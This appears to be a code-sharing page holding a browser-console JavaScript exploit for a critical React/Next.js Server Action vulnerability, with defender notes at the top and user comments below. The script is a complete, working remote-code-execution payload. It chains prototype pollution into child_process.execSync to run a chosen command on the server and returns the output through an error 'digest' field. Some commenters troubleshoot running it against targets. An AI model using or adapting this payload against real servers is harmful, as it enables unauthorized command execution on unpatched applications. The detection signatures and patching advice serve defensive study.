Created
December 16, 2025 05:01
React Critical Vulnerability (CVSS 10.0) - exploit1 code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
// Proof-of-concept request builder for the React / Next.js Server Action issue named in the
// page title. It POSTs a hand-built multipart/form-data body (fields "0", "1" and "2") with a
// Next-Action header to targetUrl, then searches the response text for a "digest" value and
// base64-decodes it. targetUrl is relative, so the request goes to the origin the script is
// evaluated on (presumably a browser devtools console; confirm).
//
// Defender notes, derived from the literals in this listing:
//  - Request side: a POST with a Next-Action header whose multipart fields contain
//    "__proto__", "constructor:constructor" or "child_process" is unlikely in legitimate
//    Server Action traffic; log it and alert on it.
//  - Response side: an error response whose "digest" field holds a long base64 string is the
//    channel this sample reads its output from.
//  - Host side: watch for the Node.js server process spawning child processes; for this
//    unmodified sample, a file named iWasHere appears in the server's working directory.
//  - The boundary string and the X-Nextjs-* header names and values (including the
//    'Request-ld' spelling on one header) are hard-coded in this copy, so they are only
//    low-confidence signatures for unmodified copies.
//  - Pattern matching is a stopgap. The fix is updating React / Next.js to the releases the
//    vendor advisory lists as patched (versions are not stated on this page).
| (async () => { | |
| // === CONFIGURATION === | |
| const cmd = "touch iWasHere"; // Command string embedded into the payload; this sample only creates a marker file named iWasHere | |
| const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain) | |
| console.log(`[*] Attempting to run command: ${cmd}`); | |
| // 1. Construct the malicious payload | |
| // Per the author: this injects the command into a child_process.execSync call and throws the result in an error digest | |
| const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('${cmd}').toString('base64');throw Object.assign(new Error('x'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}`; | |
| const boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"; | |
| // 2. Build the multipart/form-data body manually | |
| const bodyParts = [ | |
| `--${boundary}`, | |
| 'Content-Disposition: form-data; name="0"', | |
| '', | |
| payloadJson, | |
| `--${boundary}`, | |
| 'Content-Disposition: form-data; name="1"', | |
| '', | |
| '"$@0"', | |
| `--${boundary}`, | |
| 'Content-Disposition: form-data; name="2"', | |
| '', | |
| '[]', | |
| `--${boundary}--`, | |
| '' | |
| ].join('\r\n'); | |
| try { | |
| // 3. Send the request | |
| const res = await fetch(targetUrl, { | |
| method: 'POST', | |
| headers: { | |
| 'Next-Action': 'x', // Required to trigger Server Action logic | |
| 'X-Nextjs-Request-Id': '7a3f9c1e', | |
| 'X-Nextjs-Html-Request-ld': '9bK2mPaRtVwXyZ3S@!sT7u', | |
| 'Content-Type': `multipart/form-data; boundary=${boundary}`, | |
| 'X-Nextjs-Html-Request-Id': 'SSTMXm7OJ_g0Ncx6jpQt9' | |
| }, | |
| body: bodyParts | |
| }); | |
| const responseText = await res.text(); | |
| // 4. Extract and Decode the output | |
| // The server returns the output inside the "digest" field of the error; the regex below captures that JSON string value | |
| const digestMatch = responseText.match(/"digest"\s*:\s*"((?:[^"\\]|\\.)*)"/); | |
| if (digestMatch && digestMatch[1]) { | |
| let rawBase64 = digestMatch[1]; | |
| // Clean JSON escaping by re-parsing the captured text as a JSON string literal | |
| let cleanBase64 = JSON.parse(`"${rawBase64}"`); | |
| // Decode Base64 (handling UTF-8 correctly): atob yields a byte string, TextDecoder reads it as UTF-8 | |
| const decodedStr = new TextDecoder().decode( | |
| Uint8Array.from(atob(cleanBase64), c => c.charCodeAt(0)) | |
| ); | |
| console.log("%c[+] Exploit Successful!", "color: green; font-weight: bold; font-size: 14px;"); | |
| console.log("Command Output:\n----------------\n" + decodedStr + "\n----------------"); | |
| } else { | |
| console.log("%c[-] Exploit Failed", "color: red; font-weight: bold;"); | |
| console.log("Could not find 'digest' in response. Raw response preview:", responseText.substring(0, 200)); | |
| } | |
| } catch (e) { | |
| console.error("Request Error:", e); | |
| } | |
| })(); |
it cannot exploit my nextjs 10.8.2
that is true,
thanks for sharing.
Requesting that cmd be changed to something read-only like "ls", so that anyone copy-pasting doesn't accidentally create a file on the server.
Why is mine saying this?
[-] Exploit Failed [debugger eval code:66:21](chrome://devtools/content/webconsole/debugger%20eval%20code)
Could not find 'digest' in response. Raw response preview: <empty string> [debugger eval code:67:21](chrome://devtools/content/webconsole/debugger%20eval%20code)
@muhammadyaqoobmuet Did you change the targetUrl to your desired domain ?
it cannot exploit my nextjs 10.8.2